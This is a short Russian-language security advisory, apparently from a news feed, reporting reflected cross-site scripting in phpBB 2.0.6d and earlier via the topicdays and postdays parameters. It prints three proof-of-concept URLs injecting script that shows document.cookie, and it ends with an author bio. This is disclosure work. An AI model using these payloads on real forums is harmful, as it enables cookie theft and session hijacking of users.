Межсайтовый скриптинг в phpBB форуме

Программа: phpBB 2.0.6d и более ранние версии

Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение.

viewforum.php?f=[FNUM]&topicdays =[DNUM][XSS]
viewforum.php?f=1&topicdays=99"> <script>alert(document.cookie)<;/script>&star t=30
viewtopic.php?t=10&postdays=99"> <script>alert(document.cookie)<;/script>&start=20

"Анатолий Ализар : Постоянный автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.."